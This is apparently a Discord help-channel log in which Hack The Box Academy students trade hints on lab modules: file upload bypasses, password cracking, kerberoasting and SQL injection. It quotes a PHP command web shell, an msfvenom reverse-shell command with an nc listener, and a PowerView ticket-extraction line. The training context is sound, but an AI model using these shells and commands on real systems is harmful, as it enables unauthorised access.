hello all. is this the place to ask questions about this section of hackthebox? https://academy.hackthebox.com/module/18/section/70
#modules
Yup, but I doubt just adding the domain name bumps directly to DC01 here. Not sure hmmm
Give module and section name, not just a link
Also just ask your question
okay, ty, ill put it all together, few mins lol
@fathom pendant Usually how you get on machines (so far from what I've read from the module) is you supply the machine name to another tool like Invoke-WMIExec, where you mention the machine you want to execute commands on.
I'm getting a refresher on this topic helping Moo32 here lol
Same lmao
So, got this right now. started it very late last night, and went to sleep unsatisfied of not solving it. So many special cases in bash. like: " $var" if var is String but $var if var is number.
Then there was the issue imo that when talking about the "last 20 chars of a value in base64" it should technically be echo -n $value (to avoid the newline added), but examples use straight echo or echo -e.
Question: Double brackets [[ "$var" == "$val" ]] need to be added exactly when?
To get a boolean value out of the test? Do I NOT get a boolean value out of the test function / [ ] brackets when its like: [ "$1" == "myfile.txt" ] ?
Or do i need the double Brackets [[ ... ]] only when using boolean operations, like in: [[ "$var1" == "KFC" ]] && [[ $cash -lt 10 ]]
Thanks for your support
For understanding purposes, try playing around with impacket-smbserver.
But for short to clear your doubt on how SMB is confusing you is
I could host a share named julio on DC01 which serves from the location C:\Temp\David
which means, everything you see when you list \\DC01\julio is all files under C:\Temp\David not C:\julio
Im on module Active Directory Enumeration & Attacks section Credentialed Enumeration - from Windows. Im using the credentials given but i cannot connect to rdp
@rustic sage Follow this https://academy.hackthebox.com/module/147/section/1638#:~:text=either would work).-,Invoke%2DTheHash%20with%20WMI,-Invoke%2DTheHash%20with
I seem to be having nothing but issues with the Client-Side Validation section in File Upload Attacks. None of my attempts to upload a payload appear to work. I think the instructions are lacking something. Do we have to change the name of the file before uploading it, or when we change the file name in Burp does that tell the web page to automatically pull that file name?
are you getting any error?
nope it says the credentials are incorrect
can you paste or ss the commands you're using?
unverified users can't share screenshots
Ah, he's unverified.
xfreerdp /v:10.129.233.60 /u:htb-student /p:Academy_student_AD!
Seems proper to me, maybe try wrapping the passwords in single or double quotes to see if that helps? But, the command you presented should have worked fine.
Single quotes around the password should do
Thanks
Note you should edit that .locl to be .local
So was that a typo with hack the box? Because thats how they worded it.
done
? The question says .local
Did you change the module just now?
The vhosts they give you, are also .local
Payload isnt staff lol
Oh okay. interesting cause that is what I copied
He simply copied the typoed command you shared
I cannot customize any modules
I have only corrected my message here in Discord
Maybe it was from something else. NM
I'm still stuck in the Client-Side Validation section in File Upload Attacks. I've tried using Burp to modify the file name so that I can upload a php file and tried using the web developer tools to remove the file restrictions. Neither works.
If you find a bug/typo, just report it in the channel #858470491676737536
Perhaps Content-Type?
It says in the section that it shouldn't be necessary to alter this yet. I'll give it a shot.
I haven't done that module just throwing an idea
I'd suggest going over all the strategies in the module
Still getting the 'permission denied' error
Just do sudo {insert text editor here} /etc/hosts
so leave out 'echo '10.129.172.169 app.inlanefreight.local' >>?
Yes
so the text editor I will use is nano. so 'sudo nano /etc/hosts'?
Yes
Nope, that didn't work either. I just get a blank web page that says "File failed to upload" when I navigate to where the file was uploaded.
Are you sure you are handling Burp correctly? There are some great extensions for Chrome to stop HTTP requests in order to change the file name. That's how I am doing it
I'm just following the instructions in the section. I upload a regular image and send the GET to the repeater. I modify the file name and add this script <?php system($_REQUEST['cmd']); ?> as it shows. I then forward the request and get a successfully uploaded the file response. However, when I go back to the page, it just says "File failed to upload".
I'm also using the msfvenom script from the previous section to create my payload.
I also tried modifying the page using the web developer tools as the section shows. This doesn't work either. It either breaks the page or just doesn't do anything at all.
For the record, because I did not do the module yet. You've got a file which contains <?php system($_REQUEST['cmd']); - right? Save the file as Image.php.png and try to upload it. There shouldn't be any restrictions, because, it is a .png file. Intercept the request with Burp and change the file name to Image.php (remove the .png). After that you can forward the request
Ah, I see what you mean. I'm trying to use an msfvenom payload and no wonder it's not working. I need to use the <?php system($_REQUEST['cmd']); script! Thank you! I had a feeling it was something simple I was overlooking.
It's always the easy things 🙂 Glad to help
Nope, still the same thing. "File failed to upload".
And my listener doesn't grab anything.
I'm going to restart the instance. I think that's probably going to fix it.
Well, I just started the module and did exactly what I wrote before. And Burp's response is: File uploaded successfully
Yep, I get that too. However, when I go to the web page to interact with the uploaded file. I get the error that the file failed to upload.
Wait, what?
You need to go to /profile_images/shell.php?cmd=id
To activate the shell
Because if you forwarded the request, your shell should be already uploaded to the server
Okay, I see that now. Thank you! I was in the wrong directory.
Nope, that's all it was. I got the flag. I'm going to keep trying the other method, though. Thanks again for your help!
👍
any hints in file uploads skill assessment ?
File upload is on the contact form
yess I found it , but idk where my files are stored
You could start dirbuster
The only suggestion I can give rn is Path Traversal Attack
@limber river Someone wrote following on the forum a while ago: 1). You must identify which PHP files are in the web application. You can use ffuf to find them. 2). When you find the PHP files, try to read them. One of them tells you the path. The “Limited File Uploads - XXE” section of the module tells you how to read PHP files.
step 1 done
2 ) trying to figure out the step 2
Do I get extra cubes if I find a misspelling in a module?
I’d report it to the CS team if you found a misspelling
Hi, can someone give me a hand on the AD enumeration and attacks, privileged access section? I am asked to find what other user in the domain has CanPSRemote rights to a host, but using the provided command and bloodhound, I can only see that the user forend has CanPSRemote rights. I can't find another user. Can I have a hint, please?
You get a nice pat on the back 
Dude im a beginner too lol I had 0 clue on how PtH/PtT worked
I'm on the Black List Filters section of File Upload Attacks. I found several working file extensions. However, every single one of them just prints the contents of the file to the page. It doesn't execute anything I send. I've noticed a couple of people on the forum mention this, but I don't see a solution for it. Has anyone been able to get around this?
brooooooo you already surpass me !!!!
I'm sure you'll catch up to me soon enough. I'm struggling a bit with this module.
That tends to happen lol you leapfrog ahead of someone then crawl to a walking pace
I found a useful trick, use intruder against the path where you're supposed to get your result with the same wordlist and then look for a different response
it works for me
Okay, thank you. I'll give that a shot.
any help file upload skill assessment
the uploaded file must end with any php extension (i.e. php6, phtml, etc...)
so image extension then php extension
eeem ty
Hey quick question on the Kerberos attacks module, for Unconstrained Delegation - Users using krbrelayx's addspn.py; the syntax in the mod specifies addspn.py -u inlanefreight.local\\pixis -p p4ssw0rd --target-type samname -t sqldev -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local but when I try using the --target-type samname the script errors out. Checking the man page there is no such flag. Anyone find a workaround for this?
Someone mind helping me with Password Attacks Lab - Medium?
Where exactly are you stuck?
Logged in as J, found D but no password. I know what service I need to use to find it but can't log in to that service using J or root
You should be able to . Maybe j* has history on how they logged in
Can't you just use the command with no arguments to connect?
Iirc
My notes only say documentation was important
Take a look at the services running on the system
There is something that J can access. There you should find what you are looking for
Hello hint for password mutation in password attack module. What I can do to reduce my time
Guys Could you tell me How to get flag from Machine : PC Plz. T_T
Which Lab is this?
This lab Bro. : https://app.hackthebox.com/machines/PC
Ah, okay. Then this is the wrong channel
Ask here: #1109540152663085056
OK guys
I can't enter to this room. how to get permission.
Okay
Still it is 17000 wordlist it takes time.
Where
Search for them, I don't know exactly the date or the time of the hints
CTRL+F search for what do you need
I have sent you the link.
#modules message
am i the only one
like im trying to answer a question, i see its wrong.
i look for the answer for like idk 1-2 hours i go back to my first answer and somehow its right?
Hello all, on the attacking joomla section in the attacking common applications module. Found the flag, but can’t do anything with it with the script given…can’t print it out or anything. Any guidance?
There could be many reasons, but the most notorious one would be a trailing space or space before the answer.
When you're sure about an answer, make sure to pay attention to what you're selecting for paste or typing.
move parameters. I don’t get it !????
But the link points to another post
In order to open a KeePass database file in a windows command line I'm using the following command: .\KeePass.exe C:\PATH\adatabase.kdbx -pw:'crackedpassword' . The terminal is not displaying anything however. Am I missing something?
How to know default creds of mysql. Password reuse/default password
@limber river Did you find the path to the uploaded files?
if I'm not mistaken, you can't use KeePass in the terminal.
The module explains how to find such passwords
Anyone have a hint on Introduction to Deserialisation Attacks: Object Injection (PHP)? I'm injecting the XSS in, but I'm not getting the file output. Either the XSS method isn't giving output, or I'm pointing at the wrong file location.
Yo all for RDP and SOCKS Tunneling with SocksOverRDP am I supposed to be locked down by windef and privesc to disable it or am I missing something?
These academy boxes are buggy af so not sure if I am supposed to restart it haha.
oh nvm the account is already administrator
I had the same feeling- after wasting several hours. It was mostly questions where there wasn’t a real flag, but something like “Enter the number of chars in var_x” or similar. Very frustrating. Especially when you theoretically know how to get the answer in 1-2 mins, you implement it, it’s wrong, and you spend hours digging rabbit holes to circle back eventually and somehow it works
can anyone suggest a good module for someone starting out as a infosec analyst
thats what the site says
so the correct command would be mysql -h IP -P PORT -pPassword
or mysql -h IP -P PORT -p
Put it on the tab
If you need help DM me or open a ticket on the platform ( a colleague is working) @quartz saddle
ive dmed you :)
welcome to the club hahahha
originally i started doing HTB for the sake of learning a bit SyS admin stuff
as i believe, if you know how to break stuff for sure you know how to protect and fix it 😂
Exactly right @spark iris !
yeaah bro , I found the flag thank you
Can anyone help with attacking common applications skills assessment 2
What is the admin password to access this application?
I tried the default credentials and also a brute-force attack for the default admin user nxxxxxadmin, but no luck yet
Why access denied ???? When I want to get the sam with reg.exe
Are you running it as admin? Are you saving it to a writeable location?
Thank u.
im currently around in the middle of linux fundamentals and i gotta ask, there is a lot of questions which make me really to actually google stuff to find the answers
is it me just that im stupid or is it intended?
Not everything is included in the modules (but so far the modules have mostly enough to answer the section questions) and this practice of googling to find answers is a key skill. (Unless you're referring to googling literally the answers to the module questions)
most of the time i just find hints but there has been 1-2 times where i just found the command to the answer and broke it down
for example
||ss -l -4 | grep -v "127.0.0" | grep "LISTEN" | wc -l||
i would never come up with this command in my mind myself.
That's okay, try your best not to look around forums where people talk about the actual module, browse around blogs related to the topic and craft your commands/answers from there.
It'll take time to build yourself upon stuff, like the one you just shared. Everyone's been where you are right now. So don't worry.
just wanted to see how other people went through it or if the modules explain everything really good (even though i still feel the elaboration of commands lacks a bit) or i just struggle in understanding
it results into a frustration of your own self
Ah, frustration is inevitable. Trust me everyone who signed up for this go through that every other day.
Take breaks. You got this.
Attacking Common Applications - Skills Assessment II
What is the URL of the WordPress instance? --> unable to find it, cannot FUZZ vhosts, since the web site drops instantly(kinda DoS)
What is the admin password to access this application? --> cannot find password, no success for a long time, found nothing useful in gitlab, although I could not find appropriate exploit for that version of gitlab.
Thanks.
intended
Okey Okey, gotta download it locally then.
DM me I managed to solve the vhost part, but been stuck on the password for some time
I will be asking about academy modules
ok
When I start "File Upload Attacks Module", I used msfvenom to create the payload
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=4444 -f raw > reverse.php
IP from ifconfig, and the port we will listen by
when I upload the payload and click Download file I didn't get anything/shell by nc -lvnp 4444
The result ^
fuck metasploit lol
it should work
unless u used wrong port or ip
Heyo, redoing a question I've done earlier in the "Starting out" module.
SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above. Once you login, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'.
Can't figure out a way to gain access :/ Have tried gtfobins without any luck. Pointers?
No, I used my tun0 ip, and any port to listen
When it didn't work, I used "<?php echo system($_REQUEST['cmd']) ?>"
and ?cmd=cat /flag.txt
I tried to do the reverse shell but it doesn't work yet
so ?cmd=cat /flag.txt worked?
yes, I get the flag
Does the module you're doing asks you to get a reverse shell? or it's out of your own interest?
Looking at the target address, there's possibility that the outbound request to connect to our listener might not be possible? I might be wrong
you can run commands to check by printing the NIC and routes to confirm?
Nevermind. Solved it. I was overthinking it. No need to do any custom XSS commands. Just ||examine the source code for dashboard||.
Code what?
Hi guys, how i know the index number of a directory ?
code?
this is not a coding server
Can I get some help on the File Upload Attacks module in the Blacklist Filters section? I have tried all of the extensions that give 193 length response and oddly enough, some of them still won't work. All of the others that do work just give a single black box on the page instead of executing the command to print Hello HTB on the page. Has anyone else run into this?
Why not add the reference to revshells.com in the module Shells & Payloads?
Are you referring to the academy one or the main site
Academy you get one daily spawn unless you purchase cubes :p you can always restart it if you've already paid for a sub or cubes
Once you buy sub or cubes it's infinite
Where can i purchase with cubes?
Thats cool
Or i cn use a vm and connect aswell?
Pwnbox is there for users who can't run a VM on their own system
True, i think i will buy some cubes
The cheapest is like $5 USD?
Module: Password Attacks | Section: Protected Archives | Q: Use the cracked password of the user Kira, log in to the host, and read the Notes.zip file containing the flag. Then, submit the flag as the answer.
what wordlist should i use?
am using rockyou.txt and i cant crack the archive
At this point you should already have cracked kira's password iirc. However there is a resources button: and a section telling you how to mutate
i mean the wordlist to crack the zip file
Password attacks reuses the same boxes/creds
Same wordlist iirc
Try with the base then move over to the mutated
ty
Is there anyone able to assist with the Blacklist Filters section in File Upload Attacks? I have the list of working extensions, but for some reason even these get rejected when attempting to use them. I've run out of all available extensions with the provided lists and I either get the command printed on the page when I navigate to the file or just a small white box in the center of the page.
Try this List to find a extension
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload Insecure Files/Extension PHP/extensions.lst
In Introduction to Deserialisation module, Tools of the Trade, the question:
Using PHPGGC, obtain RCE on the target and submit the user-id of dnsmasq
I've checked the running processes, but I can't see dnsmasq running. Any ideas what I'm missing?
Yep, I've used it and gone through all of the working extensions that give a response length of 193. They all either print the command on the page or give a white box in the center of the page.
I did the module a long time ago, but with one of the extensions you should be able to inject PHP code.
Yeah, I would think so. I've been through every one of them and I get the same results. Also, oddly enough, even though many give a 193 response length, the site still won't take them.
Anybody here using the modules to Help prep for eJPT and eCPPT ?
||One will||.
I've been through all of them several times now. They either print the code on the page or give a white square in the center of the page.
Did you open each of the uploaded files with the browser afterwards? One of them should show your text "Hello World"
They show Hello World, but also the entire script. Just like this <?php echo "Hello World";?> printed right on the blank page.
Am I supposed to modify the extensions in any way? I haven't tried adding any extra characters to them yet.
It just ||needs to match the extension that passed when you fuzzed it.||
Right, I realize that. However, even some of those won't upload. The site won't take them.
... yes that's the point of the challenge.
You are trying to find which file extension bypasses the blacklist, but can still execute php code.
Then what was the point of even fuzzing?
Because you ||fuzz it with the list of extensions to find out which ones upload successfully.||
Ah, got it. So even though the site won't take them, they might still have execute capabilities so we need to find a way to still get them through.
I think you're overthinking it. Literally its just bypassing a weak upload check blocking .php file extension. You need to upload the file with an extension that gets around the blacklist, and would still be executed by the php server.
I've tried all the ones that give a length response of 193. I need to go back and see if I can find a way to get any of the others through somehow.
All that have returned 193 as length have been uploaded.
So now you have to call the individual files in the browser and check if they execute your PHP code
If it gets uploaded, but doesn't execute successfully to give you a shell, there's probably something wrong with your shell code.
Try this PHP Code
<?php echo "Hello world!"; ?>
The page will then display Hello World. If not, the code was not executed
I'll try that code. Thank you.
Not sure why this particular extension didn't work before, but I got it! Thank you both!
Nevermind on this. Realised I'm just over tired and overthinking things.
Sometimes things just don't work first time. As PayloadBunny knows from me messaging them yesterday (- -)
(╯°□°)╯︵ ┻━┻
I was having an issue with crt.sh last night and got parsing error... Reran the command and it worked
Just?????????
Possibly imported something correctly, or set an environmental variable?
I legit changed NOTHING
yeah but the command might have changed something (i've no recollection on what crt.sh is)
someone i can ask to ask for sanity check in password attacks easy lab
sure
Module 21 Section 129 exercise is wrong. Question asks for 20 chars but 19 chars is the accepted answer.
2 things:
- give the actual module and section name.
- post the issue in #858470491676737536
This can happen.
I was in the same situation as you and I needed the author's advice. It just didn't work. I don't know why, but suddenly it did.
They did lol
which is module 21? 😮
Bash scripting
Sorry for the confusion, posted in erratum with the details.
Pub key error? You mean attempting to ssh in and getting ... (Publickey)?
yea
That just means you need an rsa to ssh in
Instead of password
Default is like "public key, password,"
where i had to save the rsa?
But yeah it's not necessarily an error so much as "you need to get something else first"
Check the combo you have against available services
||How do I crack the Notes.zip Files in Kira's Folder||
Question:
Examine the target and find out the password of the user Will. Then, submit the password as the answer. | Under Credential Hunting in Linux
||I have found Kira's Password i can see .bak files under Will's account but unable to crack .zip file Please help||
So here's the thing: the module uses the same box, so you will get things you need later
i did it
but not sure how to use the cracked key
Use the rsa key to sign in and watch the magic
```
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
mike@skills-easy: Permission denied (publickey).
```
forgot the permissions i think
Yep
The notes.zip is for the protected archives section
i have the ip and port but it wont let me use mysql
can i have any hints or smthing been stuck for a hour
If you have the .bak, you have the creds
Module name?
u just need the .bak files
.zip is for the protected archives section
did you find anything
I haven't done that module
There are two .bak files stored in Will's account Pass and Shadow
have u read the section?
on https://academy.hackthebox.com/module/33/section/799
Tried everything I know but I can't finish it can anyone send me hints
Can you try posting the actual screenshot of the problem you're facing? So that people that haven't done the module can also try helping.
Just make sure to mask out sensitive information.
The section tells you what to do with those files, you may need to transfer them back to your system however
Iirc the un* command isn't on the victim machine
Can you provide any hint? Cause I tried to solve it at night. Couldn't find anything yet
Just turn off my pc but
I have ip and port it's a login page you have to sql inject and you have to use Id 5
Do not use msfvenom or metasploit for this task
Ah shimmers, I just realized I did complete that module. Totally forgot
Let me take a look at what I did
Nah, won't ruin it. dw
Just a tip with SQL injections, when you're using -- to comment everything after, make sure there is a space after -- like to be safe I do --+
That's what I did
I log in but it's not with the 5 id
Like erm
admin' - - '
Kinda really scuffed on phone
well, you're trying to login to a user whose id is 5
meaning that the only condition that should be true is id is 5
you just make sure everything else is false
Still
oh wait, is this actual payload you tried?
Around that I can't remember rn
take a look at the module examples once again, get a clear understanding of what the operators do
and try again.
Yeah ill js skip it pissed me off to much cbs
if anybody's pursuing CPTS and looking for an accountability partner I'm down. Im currently on Password Attacks!
Spray it on the network
You have a valid username:password combo which was cracked from the TGT which was directly provided to you from the KDC
you can use cme to spray the credentials to see which machines these creds pwn or have local access to
You also just now have access as the peter user
what he can reach you can reach.
and hey he may have unintended higher privs n such that can be discovered with bloodhound
or maybe hes just a dead end, not all users are useful.
What do you want to know?
yea
u told it
u can move laterally
check if he has access to something interesting to do the privesc
Examine the target and find out the password of the user Will. Then, submit the password as the answer.
i am stuck on this question i have kira's password
i copied the passwd file and note to my pc
u told u had access to .bak files
I have a question for the Whitelist Filters section of File Upload Attacks. Do we need to use more than one wordlist to complete this section and get the flag, or is the PHP wordlist modified with the bash script the only one we need?
I have an extension that gives a Forbidden You don't have permission to access this resource. The others just give a Not Found error.
in the "File Upload Attacks Module" I upload the .php2 file and it uploaded successfully but didn't execute, So when going to it, it shows me the code
I just finished that one. Keep modifying to extension using the ones that gave a response of 193. You'll land on one that works.
How did you upload it?
ok ive had help from someone on this broken authentication module section Predictable Reset Token but i keep getting traceback errors with the script. does anyone here have a solution that can help?
been stuck on this for 2 weeks now
have u done the password attacks module?
Yes, I completed that module.
Sorry, I'm not familiar with that module.
its ok. im just looking for someone that has and gotten through this section. i had one of the staff helping me but i can say they arent all that helpful
like its a simple script and no matter what i do i get the same exact error
I would ask for staff help again but for some reason the page will not pop up the request help discord button
as you said you have to find php files one of them contain the directory where your file will be stored and a function rename the file , then make sure that the extension of your file is allowed and executable by the webapp ( I used the bash script provided on module with the extension I found with intruder ), ofc you should use a valid content type
Passwords are still the primary method of authentication in corporate networks. If strong password policies are not in place, users will often opt for weak, easy-to-remember passwords that can often be cracked offline and used to further our access. We will encounter passwords in many forms during our assessments. We must understand the various ...
the longest module i have done for now damn
and tedious
closer to complete 50% of the academy 😄
I want to learn corporate osint table of contents
Well they are all listed there: https://academy.hackthebox.com/module/details/28
Doing the Documentation and Reporting module right now, I've typed the key combo for a vertical split in however many ways I could guess the question is asking for but it's still not taking my answer
It is in the section
ah, skipped over that
Is it possible to complete both CPTS and CBBH learning paths in 5 months?
Or 6?
Forgetting about the exams?
Let’s say I practice on both academy AND main platform
The time estimates on each module typically assume that you're a complete novice, and off the top of my head, CPTS and CBBH are both about a month each?
Maybe less, I'd need to check
The better question is how long it'll take to absorb that content and make good use of it, which is entirely dependent on how much you already know and how well you learn from the material
There is also overlap between the two
Kindly share an ss
Hello. I’m working through the Host Discovery page of the Nmap module. There’s a question at the end of the page asking me to find out which OS is running on a target network.
Am I supposed to solve the question with the info on the page, or perform an nmap scan on a spawned workstation?
No, you don't have to spawn anything for this one. Look at the last result on the page and give the OS that the host is running.
Thanks for your reply. 😄
I’m reviewing the last result and it’s an ICMP echo request. There’s no additional data aside from the MAC address.
Aha. I’ve got it.
Glad I could help.
alerted our team
Thank you
it is up now, just logged in
Are you able to spawn targets?
i am
Ah, I've been trying to spin up the target on AD Enumeration & Attacks - Skills Assessment Part I for the past 20 minutes.
It spawned now
Thanks guys!
glad to hear you're in 🙂
Anyone knows why im getting host unreachable with both vpn starting point or pwnbox?
I looked up and seems to be a common issue, but i didn't find a solution yet. Anyone can help?
Already checked the vpn and was connected correctly.
Well considering this channel is regarding modules found at https://academy.hackthebox.com I would say you're in the wrong place
Sorry about that, was the only section i could write into
I'm aware :) this happens a lot
I should make a post in community help?
Or in the #starting-point channel after following instructions found conveniently in #welcome
should there be any credentials for the IMAP/POP3 section of footprinting module?
is setting up a VPS is important?
Not really for Academy
oh alright, because i dont have money to buy the server, thank you
because I'm still student
thanks) found it
Need help with Attacking Common Services Medium Lab. Found a username, but bruteforcing make no results. Can anyone give a hint?
there is a non-default port that you need to focus once you have a username
triage
@autumn pilot And it can be said a little clear.
.
guys, anyone who can help with
section: Attacking Thick Client Applications
module: Attacking Common Applications
Hi guys, I am working on Web Attacks module (currently XXE Advanced Exfiltration with CDATA) and I am stuck on one of the examples. I tried to recreate it, however the payload does not work and I am not sure I understand why. Can anyone help please?
dm me
sorry guys, i have a problem. I am on Intro to Network Traffic Analysis module and i have found this question: "Given the capture file at /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in Hex and ASCII? (Please use best practices when using switches) " in tcpdump's submodule. I have probed all combinations that i think are correct but nothing of that are correct. I need help
and the same thing happened to me in this question: What addressing mechanism is used at the Link Layer of the TCP/IP model?
i probed with MAC but it isnt correct
anyone?
You tried sudo tcpdump -r /tmp/capture.pcap X?
Module: SQLMap Essentials
Section Name: Bypassing Web Application Protections - case #10
Hello everyone, I have a question for the case #10: I managed to get the flag both manually and through sqlmap but I did "nothing special".
I did not have to add special switches to sqlmap or modify my HTTP requests so I was wondering what was the "Primitive Protection" to be bypassed.
Thanks!
Did you manage to solve this? I'm up to that same point.
Does anyone else have any pointers on ||how to generate the CSRF token appended to the end of the cookie|| in Introduction to Deserialization Attacks Skill Assessment II?
try to look at|| https://www.php.net/manual/en/function.hash-hmac.php||. i tried to reproduce this logic by myself and had an error
If anyone gets stuck on the osTicket section of the Attacking Common Applications Module, here is a brief explanation.
support.inlanefreight.local will take you to a login page, but it isn't the correct login page. You need to visit this page instead:
support.inlanefreight.local/scp/login.php
If anyone is wondering why there are two login pages. The reason is that the one page is for customers of the ticketing system to login and interact with their tickets. The other login page is for Inlane Freight staff who manage and reply to the tickets.
They should have explained that there are 2 login pages in this section, or just setup a redirect on the landing page. There are 22 people asking the same question in here, it's ridiculous.
Maybe you missed this picture in the module.
https://academy.hackthebox.com/module/113/section/1214
I eventually noticed it and that's how I caught on
Will do. The ||key is the one commented in the code?|| also loved the bmdyy link 🙂
Any one knows how to make IDS
Ideally they should teach us that there are 2 login pages. Actually, they should have integrated that fact into the challenge. Enable guest user sign in here (support.inlanefreight.local), and force us to look at the tickets to find the name of one of the user agents. Then show us how to brute force the agent's password on this login page (support.inlanefreight.local/scp/login.php) using a simple list of 100 passwords.
We've just taught everyone that it's possible to login to "Customer" and "Agent" accounts, which is a piece of critical information, and how to brute force those accounts, while at the same time avoiding 22 people asking the same question in chat.
Post this in the #858470491676737536
Will anyone be my friend, biru.. People, I am a good person.. I want a personal hacking organization so i can discuss various projects #all
What
English only & this is not a place for such request.
can someone help me with that question in command injection Bypassing Other Blacklisted Characters
or give me a hint
i tried a lot of payloads
https://academy.hackthebox.com/module/112/section/1245
"What is the account's cleartext password?"
I have found the hash and the username but can't quite figure out how to "unhash" the hash 🙂 could anyone give me a hint?
so you need to try 🙂 the answer is in using this function. || try to reproduce the legitimate object with this function and play with serializing of this object. ||
crack it with john
On the Password Attacks module where we are supposed to use crackmapexec to get winrm user....how are we supposed to download the "Resources" file onto the Parrot OS VM?
currently working on Introduction to Bash Scripting: Flow Control - Loops, can someone explain why the decryption doesn't work?
||
```bash
for i in {1..28}
do
    var=$(echo $var | base64)
    salt=${#var}
done
```
||
What section are you doing?
echo $salt add this in last line
@red current Network Services, question 1
wget? 🤔
I'm running into an issue with the first question on the Limited File Uploads section in File Upload Attacks. I tried using Ffuf to get a list of directories or pages and I only get the same directory starting with the letter i. Does anyone have any hints for this one?
@raven quail Unable to download the "resources" from the "Password Attacks - Network Services" module...apparently it is the only way to solve the winrm user question, etc
dm
below ||done||, or could you give an example
okay, i did that. still got bad decrypt
show me ss in dm
someone can give me a nudge for the module: attacking common services - section: attacking sql databases
What is the password for the "mssqlsvc" user?
The section tells you how to crack ipmi
Try to get the hash
i got it
i just needed to read a bit more about how ||responder|| works
was doing it wrong
any nudge on footprinting lab medium . got access to the database not able to get the htb user password
I've tried using several different payloads for the Limited File Uploads in File Upload Attacks, and nothing seems to work to get the flag for the first question. Ffuf should be able to locate pages or directories and that isn't working either. It's almost like there isn't anything to find here. It's really strange.
Look at the databases and then read out the corresponding database
users ?
Take a good look at the features of the website and then play around with them
Also query is a useful option
Not sure what you mean, but I'll see what I can find.
hello i wanted to ask where can i just talk to ppl ?
Your screenshot currently shows the DBs master, model and msdb
oh it says i have no access
Look around for a file that has access credentials to sign in with potentially. Or maybe another user has better permissions that you find creds for
srry but i didnt understand wut u mean
oh ok ty
Yeah, this site doesn't really have any features. It's pretty basic.
You can upload pictures, right?
Yes, but any time I try to add the script to them like it shows in the section, I either get an error that there is no content or I get nothing at all but blank page with Update your logo written on it. And the source code just has the usual page info.
Has anyone faced an issue where, you kerberoast and redirect the outputs to a file in the machine.
Then when I try to move the file to my machine, the format is just very bad. (sharing screenshots)
This is a screenshot from the antak webshell. I cat it and it seems fine but
Here's how it is after downloading
Sometimes you may need to upgrade a webshell to a full shell
I get the same results even from normal shell.
Have you tried just copy/paste?
Maybe PHP is just the wrong language
Not sure what you mean. I've tried using the XML scripts and I also don't get anything.
It's this space, that's the problem. I guess I have to change the format when I output it.
Okay, XML is fine.
Which graphic format does XML use?
I remember having this issue, I think you could add -nowrap to your command. Might be --nowrap
SVG.
Ah true, I extracted the TGS using PowerView, should have just stuck with Rubeus.
what module is that
Active Directory Skills Assessment 1
I guess my issue is that there doesn't appear to be a way to know what directory the flag is in. I've tried using ffuf, the provided scripts, and just trying to get things we've used in previous sections to work and I can't find the right directory. Ffuf should have been able to provide it.
After I got home, first try, got it. Woo! Just final question to go now! Thanks for the assist!
Yeah, the command I used is more preferred to be saved to a CSV file.
then use cat command to read it ?
We could, but I was thinking in cases where we just want to get all the TGS in a file and crack it one go to save time.
Like Simple one file transfer and supplying the file direct for cracking.
cat the .csv file?
ye!
hey guys im on Password attack module, on Credential Hunting in Linux i was able to login on the system but i can not find will credential any hint?
the problem is about the space right?
Perhaps a __ba__c__k__up is useful
Yeah, but wouldn't cat'ing the csv file just make it worse? I haven't tried it so I'm not sure.
Read everything the section tells you
do u like lasagna?
i saw that but only i can read one file there
nah XD
let me try again with lazagne so

Let me check what you said rq
Any clues on how to find the right directory for the Limited File Uploads in File Upload Attacks?
I got offtrack, but yeah, for readability. we can do it like that I guess.
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Out-File -File TGS.txt my mistake was this command, hoping that I would get the hashes down quickly to start cracking, instead of transferring rubeus to the machine.
But, yeah. Thanks for pointing that out. @wide river
yw, feel free to dm me if you need hint for AD Skill Assessment
i have already probed but it isnt work 😦
which modules do you recommend to start? an order to follow since im a beginner in this 
Infosec fundamentals path
@zinc marsh ive got some error with lazagne
which one is that?
thank u i found it
transfer it as .zip archive
But you could try to read the source code of upload.php
in attacking common services the dns section
do i need to add the ip to resolvers.txt?
Nah @winged hedge
that was the problem, thanks
Yes, htb is not an approved TLD. You need a name server which can resolve this domain.
woot!! finally
huh?
Looks like they are selling edu emails or something
Now do it again
again ? 😮
honestly going back over modules, especially if you struggled. Is helpful
Or even looking if alternative ways exist
The point is not to complete a module as quickly as possible, but to take away as much knowledge as possible
^ can you reliably re-exploit something
yes
It's a big reason why I lurk here. It reinforces knowledge
i always wondered why people spend their time to help people instead of keep finishing the role path
I feel the same way. I always learn something new by answering the questions.
it makes sense now
learned a lot, found new techniques that i didn't know, well gonna retake module after few days
Did you know about the IMAP n fetch id body[] command
As opposed to the example given?
No, honestly, until now I never understood why you should query an IMAP server with the Console.
If I have access, then I can also use a mail client.
That's why I never really cared about it until now.
But the question keeps coming up. Someday, when I find the time, I'll try it with the Console. Just for fun
IMAP and DNS
I linked a useful IMAP commands article
DNS is easy, but IMAP …
Yes, I have seen it. Thanks
Once you know how it works it's easy with console...
Then again that's how most console things work
MSSQL GUI? Gross, MSSQL CLI ? Clean
I believe that immediately. That's the case with everything. Once you understand it, it's simple and logical.
The modules are great jumping points as well if you want to dive deeper
i added the ip to resolvers.txt
and in etc/host as inlanefreight.com
why?
@lethal shard Any hints on Q2 of the Skill Assessment 2? 🙂
with inlanefreight.htb didnt work the subbrute
They are pointing out: inlanefreight.com not htb
Needed that haha
Inlanefreight.com is an actual (fake) website that HTB owns
So true lmao
I'm at 13 hours on password Attacks and about halfway through haha
Yes, I got that already. It's a directory beginning with the letter i. There's nothing in it when I search it.
Password attacks is needlessly slow
it has a different ip
realistic but needless
longest module i have done by far
whos good on programming
Hy i am new fresher in this group
See above message
No one.
No one here will help you ddos
Some indian dude on YT may help you though
they always come in clutch
name ??
Idk dude
hahahahaha
I was being abstract. DDOS is directly against any ToS, therefore illegal. If you read #rules
||phpggc||
@fathom pendant come on private
Have you solved the task completely?
The first question is exactly the same in principle.
